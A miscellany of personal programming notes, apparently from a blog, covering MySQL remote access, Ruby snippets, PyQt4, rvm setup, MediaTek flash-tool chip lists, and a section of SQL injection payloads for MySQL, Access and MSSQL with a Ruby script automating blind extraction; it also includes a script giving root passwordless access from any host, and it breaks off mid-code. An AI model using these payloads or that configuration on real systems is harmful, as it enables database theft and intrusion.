A default MySQL installation cannot be connected to remotely.
After logging in to MySQL, run

SELECT user,host FROM mysql.user;

If it returns only one row (root@localhost), that is the cause: no account is allowed to log in from any other host.
Save the script below as user.sql, log in to MySQL, and run:

use mysql;
source user.sql;
flush privileges;

Notice: this resets the MySQL user table and sets the root password to empty.

Caveat: the script grants every global privilege to root from any host ('%') with an empty password, so anyone who can reach port 3306 owns the server. It is also written against the 39-column mysql.user layout of MySQL 5.1; later versions add plugin and authentication_string columns (and 5.7 removes Password entirely), so sourcing it there leaves a table the server cannot authenticate against. On any version the same goal is reached without the reset: create a dedicated account with CREATE USER ... IDENTIFIED BY a real password, restrict its Host to the client subnet rather than '%', GRANT only the privileges it needs on the application database, and check that bind-address in my.cnf (or skip-networking) is not pinning the server to 127.0.0.1. Keep the single-row user table if remote access is not actually wanted.

Script contents (user.sql):

SET FOREIGN_KEY_CHECKS=0;

-- ----------------------------
-- Table structure for `user`
-- ----------------------------
USE mysql;
DROP TABLE IF EXISTS `user`;
CREATE TABLE `user` (
`Host` char(60) COLLATE utf8_bin NOT NULL DEFAULT '',
`User` char(16) COLLATE utf8_bin NOT NULL DEFAULT '',
`Password` char(41) CHARACTER SET latin1 COLLATE latin1_bin NOT NULL DEFAULT '',
`Select_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
`Insert_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
`Update_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
`Delete_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
`Create_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
`Drop_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
`Reload_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
`Shutdown_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
`Process_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
`File_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
`Grant_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
`References_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
`Index_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
`Alter_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
`Show_db_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
`Super_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
`Create_tmp_table_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
`Lock_tables_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
`Execute_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
`Repl_slave_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
`Repl_client_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
`Create_view_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
`Show_view_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
`Create_routine_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
`Alter_routine_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
`Create_user_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
`Event_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
`Trigger_priv` enum('N','Y') CHARACTER SET utf8 NOT NULL DEFAULT 'N',
`ssl_type` enum('','ANY','X509','SPECIFIED') CHARACTER SET utf8 NOT NULL DEFAULT '',
`ssl_cipher` blob NOT NULL,
`x509_issuer` blob NOT NULL,
`x509_subject` blob NOT NULL,
`max_questions` int(11) unsigned NOT NULL DEFAULT '0',
`max_updates` int(11) unsigned NOT NULL DEFAULT '0',
`max_connections` int(11) unsigned NOT NULL DEFAULT '0',
`max_user_connections` int(11) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`Host`,`User`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_bin COMMENT='Users and global privileges';

-- ----------------------------
-- Records of user
-- ----------------------------
INSERT INTO `user` VALUES ('localhost', 'root', '', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', '', '', '', '', '0', '0', '0', '0');
INSERT INTO `user` VALUES ('127.0.0.1', 'root', '', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', '', '', '', '', '0', '0', '0', '0');
INSERT INTO `user` VALUES ('%', 'root', '', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', 'Y', '', '', '', '', '0', '0', '0', '0');
flush privileges;

Python
Press F5 to open the Run dialog (this is Notepad++; $(FULL_CURRENT_PATH) expands to the file being edited), save the command below, then assign it a shortcut.

cmd /k  c:\python27\python "$(FULL_CURRENT_PATH)" & PAUSE & EXIT

I use Ctrl+F9.
After that, press Ctrl+S to save your changes and then the shortcut you assigned (Ctrl+F9 here) to run the current file in cmd, which is handy for debugging.

Ruby

cmd /k  C:\Ruby22-x64\bin\ruby "$(FULL_CURRENT_PATH)" & PAUSE & EXIT

Using PhantomJS to open a web page and take a screenshot

var page = require('webpage').create();

// Log every request the page issues and every response it receives
page.onResourceRequested = function(request) {
    console.log('Request ' + JSON.stringify(request, undefined, 4));
    console.log('---------------------------------------------------------------------');
};
page.onResourceReceived = function(response) {
    console.log('Receive ' + JSON.stringify(response, undefined, 4));
    console.log('---------------------------------------------------------------------');
};

page.open('https://www.baidu.com', function(status) {
    console.log("Status: " + status);
    if (status === "success") {
        page.render('example.png');   // write the rendered page to example.png
    }
    phantom.exit();
});

Save the script and run it with phantomjs; the screenshot is written to example.png in the working directory.

PhantomJS is close to abandoned; Google's headless Chrome is the recommended replacement today.

Environment:
Windows 10
Python 2.7.10

0x01 Install PyQt4
Download it from this page; make sure the build matches your Python version, Qt version and 32/64-bit architecture.
https://riverbankcomputing.com/software/pyqt/download
The version I picked is PyQt4-4.11.4-gpl-Py2.7-Qt4.8.7-x64.exe
(PyQt4 is no longer maintained by Riverbank; the download page now centres on PyQt5/PyQt6.)

0x02 Write a test script

import sys
from PyQt4 import QtGui

app = QtGui.QApplication(sys.argv)   # one QApplication per process
widget = QtGui.QWidget()
widget.resize(250, 150)
widget.setWindowTitle('PyQt')
widget.show()
sys.exit(app.exec_())                # enter the Qt event loop

If it runs and an empty window pops up, PyQt4 is installed.

0x03 Parsing the DOM with PyQt4's QtWebKit

To be continued.

1. Summary of array traversal methods

array = (1..10).to_a

# Integer#times with an index
length = array.length
length.times do |t|
  print "#{array[t]} "
end
puts "\n"

# for over an inclusive range of indexes
length = array.length - 1
for i in 0..length do
  print "#{array[i]} "
end
puts "\n"

# for over the elements themselves
for i in array do
  print "#{i} "
end
puts "\n"

# each with a block
array.each { |x| print x, " " }
puts "\n"

# while loop with a manual index
length = array.length
i = 0
while i < length do
  print "#{array[i]} "
  i = i + 1
end
puts "\n"

# until loop with a manual index
length = array.length
i = 0
until i == length do
  print "#{array[i]} "
  i += 1
end
puts "\n"

# each_index yields the index rather than the element
array.each_index do |i|
  print "#{array[i]} "
end
puts "\n"

2. Connecting to databases from Ruby

  • mysql
    require 'mysql'
    begin
      db = Mysql.init
      db.options(Mysql::SET_CHARSET_NAME, 'utf8')
      # connect on the object configured above; the class method Mysql.real_connect
      # would open a fresh connection and discard the option just set
      db.real_connect("127.0.0.1", "root", "123456", "test", 3306)
      db.query("SET NAMES utf8")
      db.query("drop table if exists tb_test")
      db.query("create table tb_test (id int,
                text LONGTEXT) ENGINE=MyISAM DEFAULT CHARSET=utf8")
      db.query("insert into tb_test (id, text) values (
                1,'first line'),(2,'second line')")
      printf "%d rows were inserted\n", db.affected_rows
      rslt = db.query("select text from tb_test")
      while row = rslt.fetch_row do
        puts row[0]
      end
    rescue Mysql::Error => e
      puts "Error code: #{e.errno}"
      puts "Error message: #{e.error}"
      puts "Error SQLSTATE: #{e.sqlstate}" if e.respond_to?("sqlstate")
    ensure
      db.close if db
    end
  • redis
    #!/usr/bin/env ruby

    require 'redis'

    def writeToFile(file, content)
      fp = File.new(file, "a+")
      if fp
        fp.syswrite(content)
        fp.close
      else
        puts "..."
      end
    end

    # Print every field of the server's INFO reply.
    # Fetch INFO once; calling redis.info inside the loop would issue one
    # round trip per key. Pass :password => '...' if the server sets requirepass.
    def connect(host)
      redis = Redis.new(:host => host, :port => 6379)
      info = redis.info
      info.keys.each do |key|
        puts "#{key}:\t#{info[key]}"
      end
    end

    connect("1.1.1.1")
  • sqlite3
    require 'sqlite3'

    db = SQLite3::Database.new('test.db')

    db.execute("create table if not exists test(
                ID integer not null,
                Username varchar(20) null,
                Password varchar(64) null)")
    # bind parameters instead of splicing values into the SQL string
    db.execute("insert into test(ID, Username, Password) values(?, ?, ?)",
               [0, 'admin', 'admin'])
    db.execute("select * from test") { |row| p row }
    db.execute("update test set Password = ? where ID = ?", ['12345', 0])
3. Ruby sockets

  • Server:

    require 'socket'

    server = TCPServer.open('0.0.0.0', 8080)   # listens on every interface
    loop do
      Thread.start(server.accept) do |client|
        begin
          puts "#{client.to_i} online"
          loop do
            # read with no length blocks until the peer closes the connection
            # and returns "" on the next call; use readpartial or gets to
            # receive data as it arrives instead
            data = client.read
            raise "empty" if data.empty?
            puts data
          end
        rescue => e
          puts "#{client.to_i} offline"
        ensure
          client.close
        end
      end
    end
  • Client:

    require 'socket'

    hostname = '127.0.0.1'
    port = 8080
    buf = 'test'
    s = TCPSocket.open(hostname, port)
    s.write buf
    sleep(1)        # give the server a moment before the close ends its read
    s.close
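A line-framed version of the exchange above, added here as an example and not part of the original post. Both ends run in one process on the loopback interface so it works offline: the server answers each "\n"-terminated message with an acknowledgement instead of blocking in read until the client closes, and it drops any peer that sends a line longer than MAX_LINE (an assumed limit chosen for this example) rather than buffering without bound.

```ruby
require 'socket'

MAX_LINE = 1024   # assumed limit for this example: longer "lines" get the peer dropped

# Accept connections in a background thread; each client gets its own thread.
# Returns the listening socket (its port is server.addr[1]) and the acceptor thread.
def start_ack_server(host = '127.0.0.1', port = 0)
  server = TCPServer.new(host, port)            # port 0 lets the OS pick a free port
  acceptor = Thread.new do
    loop do
      client = server.accept
      Thread.new(client) do |c|
        begin
          # gets(limit) returns one "\n"-terminated message at a time and nil at EOF,
          # whereas read with no length blocks until the peer closes the connection
          while (line = c.gets(MAX_LINE))
            break unless line.end_with?("\n")    # oversize line: refuse to continue
            c.write("ack:#{line.chomp}\n")
          end
        rescue IOError, SystemCallError
          # peer reset or closed mid-exchange; nothing to do
        ensure
          c.close
        end
      end
    end
  end
  [server, acceptor]
end

# Client side: send each message as its own line and collect the reply to each.
def send_messages(host, port, messages)
  TCPSocket.open(host, port) do |s|
    messages.map do |m|
      s.write("#{m}\n")
      reply = s.gets(MAX_LINE)
      reply && reply.chomp
    end
  end
end

# Run both ends on loopback and return the replies the client received.
def demo
  server, acceptor = start_ack_server
  replies = send_messages('127.0.0.1', server.addr[1], %w[hello world])
  acceptor.kill
  server.close
  replies
end

puts demo.inspect if __FILE__ == $0
```

The framing is the point: without a delimiter (or a length prefix) the receiver has no way to know where one message ends, which is why the original server only ever sees the whole stream at once when the client closes.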

4. Serving gem documentation locally

The gem documentation on rubygems.org is slow to reach from here, but RubyGems can serve documentation itself.
Installing a gem also installs its documentation by default; to skip that and save space, use gem install XXX --no-document.
Start the built-in documentation server with:

gem server --port 1234

Then open http://localhost:1234 to browse the documentation of the installed gems.
Note: RubyGems 3.x no longer ships the gem server command; it was moved into a separate gem.

5. Changing the colour of console output in Ruby

puts "\033[1mForeground colours\033[0m\n"
puts " \033[30mBlack (30)\033[0m\n"
puts " \033[31mRed (31)\033[0m\n"
puts " \033[32mGreen (32)\033[0m\n"
puts " \033[33mYellow (33)\033[0m\n"
puts " \033[34mBlue (34)\033[0m\n"
puts " \033[35mMagenta (35)\033[0m\n"
puts " \033[36mCyan (36)\033[0m\n"
puts " \033[37mWhite (37)\033[0m\n"
puts ''
puts "\033[1mBackground colours\033[0m\n"
puts " \033[40m\033[37mBlack (40), White Text\033[0m\n"
puts " \033[41mRed (41)\033[0m\n"
puts " \033[42mGreen (42)\033[0m\n"
puts " \033[43mYellow (43)\033[0m\n"
puts " \033[44mBlue (44)\033[0m\n"
puts " \033[45mMagenta (45)\033[0m\n"
puts " \033[46mCyan (46)\033[0m\n"
puts " \033[47mWhite (47)\033[0m\n"
puts ''
puts "\033[1mOther\033[0m\n"
puts " Reset (0)"
puts " \033[1mBold (1)\033[0m\n"
puts " \033[4mUnderlined (4)\033[0m\n"

These are ANSI SGR escape sequences: \033[ introduces the sequence, the number selects the attribute, m applies it, and 0 resets everything.

6. A few gems worth noting

Ruby json gem
https://rubygems.global.ssl.fastly.net/gems/json-1.8.3.gem
Raspberry Pi wiringpi GPIO gem
http://pi.gadgetoid.com/article/wiringpi-as-a-ruby-gem

7. The right way to install rvm

Source: http://rvm.io/rvm/install
First import the GPG public key that rvm releases are signed with:

gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3

Install the stable version of rvm (together with a Ruby):

curl -sSL https://get.rvm.io | bash -s stable --ruby

Two caveats. The keys.gnupg.net keyserver has since shut down; rvm.io now documents fetching the keys from keyserver.ubuntu.com and lists a second signing key, 7D2BAF1CF37B13E2069D6956105BD0E739499BDB, next to the one above. And the installer only verifies the release signature when gpg is installed and the keys have been imported, so do the import first; otherwise the pipe into bash executes whatever the server returned, unverified.

8. Fixing RVM's failure to build ruby-2.3.3 on Kali 2.0

  • Error details:
    ruby-2.3.3 - #compiling.......................................................................-
    Error running '__rvm_make -j4',
    showing last 15 lines of /usr/local/rvm/log/1488041042_ruby-2.3.3/make.log
    exts.mk:210: recipe for target 'ext/openssl/all' failed
    make[1]: *** [ext/openssl/all] Error 2
    make[1]: *** Waiting for unfinished jobs....
    installing default nkf libraries
    compiling objspace_dump.c
    linking shared-object json/ext/generator.so
    make[2]: Leaving directory '/usr/local/rvm/src/ruby-2.3.3/ext/json/generator'
    linking shared-object objspace.so
    make[2]: Leaving directory '/usr/local/rvm/src/ruby-2.3.3/ext/objspace'
    linking shared-object nkf.so
    make[2]: Leaving directory '/usr/local/rvm/src/ruby-2.3.3/ext/nkf'
    make[1]: Leaving directory '/usr/local/rvm/src/ruby-2.3.3'
    uncommon.mk:203: recipe for target 'build-ext' failed
    make: *** [build-ext] Error 2
    ++ return 2
    There has been an error while running make. Halting the installation.

Reading /usr/local/rvm/log/1488041042_ruby-2.3.3/make.log shows that it is the openssl extension that fails, because of the system OpenSSL version: ruby 2.3's bundled ext/openssl does not build against OpenSSL 1.1.x, which a rolling Kali ships.

  • Fix:
    Step 1: install a separate OpenSSL for rvm's own use:
    rvm pkg install openssl

Step 2: build and install ruby, pointing it at that OpenSSL (mine lives in /usr/local/rvm/usr/):

rvm install ruby-2.3.3 --with-openssl-dir=/usr/local/rvm/usr/

Keep in mind that this private OpenSSL is not updated by the distribution's package manager, so any Ruby built against it stays on that OpenSSL release until you rebuild it.

9. Setting ruby-china as the default gem source

The taobao mirror is gone; ruby-china is the remaining mirror.

gem sources --add https://gems.ruby-china.org/ --remove https://rubygems.org/

Set ruby-china as the default source for Bundler as well:

bundle config mirror.https://rubygems.org https://gems.ruby-china.org

After this change the domestic mirror is used even when the Gemfile names rubygems.org as its source.

Note: ruby-china has since moved the mirror to https://gems.ruby-china.com/. Whatever mirror you use, it sits between you and rubygems.org, so pin versions in Gemfile.lock and compare gem checksums with rubygems.org for anything security-sensitive.

SP Flash Tool versions and the MTK processors each one supports

SP_Flash_Tool-v3.1224.0.100
MT6516,MT6573,MT6573,MT6575,MT6575,MT6577

SP_Flash_Tool-v3.1332.0.187
MT6516,MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6582,MT8135

SP_Flash_Tool-v3.1344.0.212
MT6516,MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6582,MT8135,MT6592,MT6571

SP_Flash_Tool-v5.1352.01
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT6592

SP-Flash-Tool-v5.1436.00
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752

SP-Flash-Tool-v5.1528.00
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6735M,MT6753,MT8163,MT8590,MT6580,MT6570

SP-Flash-Tool-v5.1532.00
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6735M,MT6753,MT8163,MT8590,MT6580,MT6570,MT6755

SP_Flash_Tool_5.1343
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT6592

SP_Flash_Tool_5.1504
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6735M,MT6753

SP_Flash_Tool_5.1520
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6735M,MT6753,MT8163,MT8590,MT6580,MT6570

SP_Flash_Tool_5.1524.00
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6735M,MT6753,MT8163,MT8590,MT6580,MT6570

SP_Flash_Tool_v5.1452
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6735M,MT6753

SP_Flash_Tool_v5.1512
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6735M,MT6753,MT8163,MT8590,MT6580,MT6570

SP_Flash_Tool_v5.1516
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6735M,MT6753,MT8163,MT8590,MT6580,MT6570

SP_Flash_Tool_v5.1548
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737,MT6735M,MT6753,MT8163,MT8590,MT6580,MT6570,MT6755,MT6797

SP_Flash_Tool_v5.1552
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737T,MT6735M,MT6737M,MT6753,MT8163,MT8590,MT7623,MT6580,MT6570,
MT6755,MT6797

SP_Flash_Tool_v5.1604
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737T,MT6735M,MT6737M,MT6753,MT8163,MT8590,MT7623,MT6580,MT6570,
MT6755,MT6750,MT6797

SP_Flash_Tool_v5.1612
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737T,MT6735M,MT6737M,MT6753,MT8163,MT8590,MT7623,MT6580,MT6570,
MT6755,MT6750,MT6797,MT6757

SP_Flash_Tool_v5.1616_Win
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737T,MT6735M,MT6737M,MT6753,MT8163,MT8590,MT7623,MT6580,MT6570,
MT6755,MT6750,MT6797,MT6757,ELBRUS,MT6798,MT0507

SP_Flash_Tool_v5.1620_Win
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737T,MT6735M,MT6737M,MT6753,MT8163,MT8590,MT7623,MT6580,MT6570,
MT6755,MT6750,MT6797,MT6757,ELBRUS,MT6798,MT0507,MT8160,MT0633

SP_Flash_Tool_v5.1624_Win
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737T,MT6735M,MT6737M,MT6753,MT8163,MT8590,MT7623,MT6580,MT6570,
MT6755,MT6750,MT6797,MT6757,ELBRUS,MT6798,MT0507,MT8167,MT0633

SP_Flash_Tool_v5.1628_Win
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737T,MT6735M,MT6737M,MT6753,MT8163,MT8590,MT7623,MT6580,MT6570,
MT6755,MT6750,MT6797,MT6757,ELBRUS,MT6799,MT0507,MT8167,MT0633

SP_Flash_Tool_v5.1632_Win
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737T,MT6735M,MT6737M,MT6753,MT8163,MT8590,MT8521,MT7623,MT6580,
MT6570,MT6755,MT6750,MT6797,MT6757,ELBRUS,MT6799,MT0507,MT8167,MT6570,MT0690

SP_Flash_Tool_v5.1636_Win
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737T,MT6735M,MT6737M,MT6753,MT8163,MT8590,MT8521,MT7623,MT6580,
MT6570,MT6755,MT6750,MT6797,MT6757,ELBRUS,MT6799,MT6798,MT8167,MT6570,MT0690

SP_Flash_Tool_v5.1640_Win
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737T,MT6735M,MT6737M,MT6753,MT8163,MT8590,MT8521,MT7623,MT6580,
MT6570,MT6755,MT6750,MT6797,MT6757,MT6757D,ELBRUS,MT6799,MT6798,MT8167,MT6570,MT0690

SP_Flash_Tool_v5.1644_Win
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737T,MT6735M,MT6737M,MT6753,MT8163,MT8590,MT8521,MT7623,MT6580,
MT6570,MT6755,MT6750,MT6797,MT6757,MT6757D,ELBRUS,MT6799,MT6798,MT8167,MT6570,MT0690

SP_Flash_Tool_v5.1648_Win
MT6573,MT6573,MT6575,MT6575,MT6577,MT6589,MT6572,MT6571,MT6582,MT8135,MT8127,MT6592,MT6595,MT6752,
MT2601,MT6795,MT8173,MT6735,MT6737T,MT6735M,MT6737M,MT6753,MT8163,MT8590,MT8521,MT7623,MT6580,
MT6570,MT6755,MT6750,MT6797,MT6757,MT6757D,ELBRUS,MT6799,MT6759,MT8167,MT8516,MT6570,MT6763

MySQL
1. Built-in functions and variables

@@datadir, version(), database(), user(), load_file(), SELECT ... INTO OUTFILE

load_file() and INTO OUTFILE need the FILE privilege, and on MySQL 5.7 and later secure_file_priv usually restricts or disables file access altogether.

2. Joining query results with concat(), group_concat() and concat_ws()
Example:

xxx.php?id=1 and 1=2 union select 1,
group_concat(username,0x3a,password),3 from user

0x3a is ':' written as a hex literal, so the separator needs no quote characters.

3. Enumerating tables and columns from the built-in information_schema database
Tables:

xxx.php?id=1 and 1=2 union select 1,2,table_name from
(select * from information_schema.tables where table_schema=<database name as a hex literal>
order by table_schema limit 0,1)t limit 1-- 

Columns:

xxx.php?id=1 and 1=2 union select 1,2,column_name from
(select * from information_schema.columns where table_name=<table name as a hex literal>
and table_schema=<database name as a hex literal> order by 1 limit 1,1)t limit 1-- 

The names are written as hex literals (0x74657374 for 'test') so the payload contains no quotes; MySQL compares a hex literal to a string column as a string. The trailing -- must be followed by a space to count as a comment, so in a URL write it as --+ or -- -.

This combines with concat's joining:

xxx.php?id=1 and 1=2 union select 1,2,group_concat(column_name,0x20)
from (select * from information_schema.columns where table_name=<table name as a hex literal>
and table_schema=<database name as a hex literal> order by 1 limit 0,n)t limit 1-- 
[limit 0,n returns the first n rows, which group_concat then joins into one string]

Access

Guess a table name

*.asp?id=1 and exists (select * from admin)

Guess a column name

*.asp?id=1 and exists (select password from admin)

Order by query (find the number of columns)

*.asp?id=1 order by 3

union query

*.asp?id=1 union select 1,password,3 from admin

When union is not available
First determine the length of the value

*.asp?id=132 and (select top 1 len(user) from admin) > 5

Then guess it one character at a time

*.asp?id=132 and (select top 1 asc(mid(user,1,1)) from admin) > 97

Once asc(mid(user,1,1)) is pinned down as 97, the first character of user is 'a' (97 is the ASCII code of 'a').
After that, continue from the second position

*.asp?id=132 and (select top 1 asc(mid(user,2,1)) from admin) > 97

and so on. Each request answers one yes/no question (the page renders normally when the comparison is true), so narrowing the range with a binary search instead of stepping through values one by one takes about seven requests per character.
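The Access guessing loop above, as an added example that is not part of the original post: Ruby code that builds the page's two payload shapes and drives them with a binary search, so each character costs seven requests rather than the up-to-127 linear guesses the text walks through. The fake_page_ok? oracle and the "admin" row it answers for are constructed stand-ins for the *.asp?id= endpoint; in practice you replace the oracle with an HTTP request and compare the response against a known-good page.

```ruby
# Boolean-based blind extraction against an Access back end.
# The injector only learns "page looks normal" vs "page looks different", so
# every question has to be a true/false comparison the page already uses.
ACCESS_LEN_PAYLOAD  = "%d and (select top 1 len(user) from admin) > %d"
ACCESS_CHAR_PAYLOAD = "%d and (select top 1 asc(mid(user,%d,1)) from admin) > %d"

# Constructed stand-in for the vulnerable endpoint: it "executes" exactly the two
# condition shapes above against a fake admin table and returns true when the
# page would render normally. Replace with an HTTP request in a real engagement.
FAKE_ADMIN_USER = "admin"

def fake_page_ok?(payload)
  if (m = payload.match(/len\(user\) from admin\) > (\d+)\z/))
    FAKE_ADMIN_USER.length > m[1].to_i
  elsif (m = payload.match(/asc\(mid\(user,(\d+),1\)\) from admin\) > (\d+)\z/))
    FAKE_ADMIN_USER[m[1].to_i - 1].ord > m[2].to_i
  else
    raise ArgumentError, "unsupported condition: #{payload}"
  end
end

# Binary search over lo..hi for the hidden value v, asking "v > mid?" each round.
# When the answer is true v lies above mid; when false v is mid or below.
def binary_search(lo, hi)
  while lo < hi
    mid = (lo + hi) / 2
    if yield(mid)
      lo = mid + 1
    else
      hi = mid
    end
  end
  lo
end

def guess_length(id, oracle, max = 64)
  binary_search(0, max) { |n| oracle.call(format(ACCESS_LEN_PAYLOAD, id, n)) }
end

def guess_char(id, pos, oracle)
  binary_search(0, 127) { |n| oracle.call(format(ACCESS_CHAR_PAYLOAD, id, pos, n)) }.chr
end

# Length first, then every position; the oracle is any object responding to call(payload).
def extract_user(id, oracle)
  len = guess_length(id, oracle)
  (1..len).map { |pos| guess_char(id, pos, oracle) }.join
end

# Run the extraction against the fake endpoint and count the requests it took.
def demo(id = 132)
  requests = 0
  counting = ->(payload) { requests += 1; fake_page_ok?(payload) }
  user = extract_user(id, counting)
  [user, requests]
end

puts demo.inspect if __FILE__ == $0
```

The ranges are the only tuning knobs: 0..64 for the length and 0..127 for a 7-bit character; widen the character range if the column can hold non-ASCII text, and the cost grows by one request per doubling.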

MSSQL
Error-based MSSQL injection:
Check whether the back end is MSSQL

' and exists (select * from sysobjects)--

If the page returns normally, it is MSSQL; otherwise sysobjects does not exist and the query errors out (sysobjects is a system view present in every SQL Server database, and other engines have no such object).

Guess a table name:

' and exists (select * from admin)--

If the table exists, the normal page comes back; if the query errors, it does not.

VC

#include <stdio.h>

int main(void) {
    int a = 1;
    int b = 2;
    int c;
    __asm {
        mov eax, a      /* load a */
        mov ebx, b      /* load b */
        add eax, ebx    /* eax = a + b */
        mov c, eax      /* store the sum in c */
    }
    printf("%x\n", c);  /* prints 3 */
    return 0;
}

__asm blocks are only accepted by the 32-bit MSVC compiler; the x64 compiler has no inline assembler.

GCC

#include <stdio.h>

int main(void) {
    int a = 1;
    int b = 2;
    int c;
    asm(
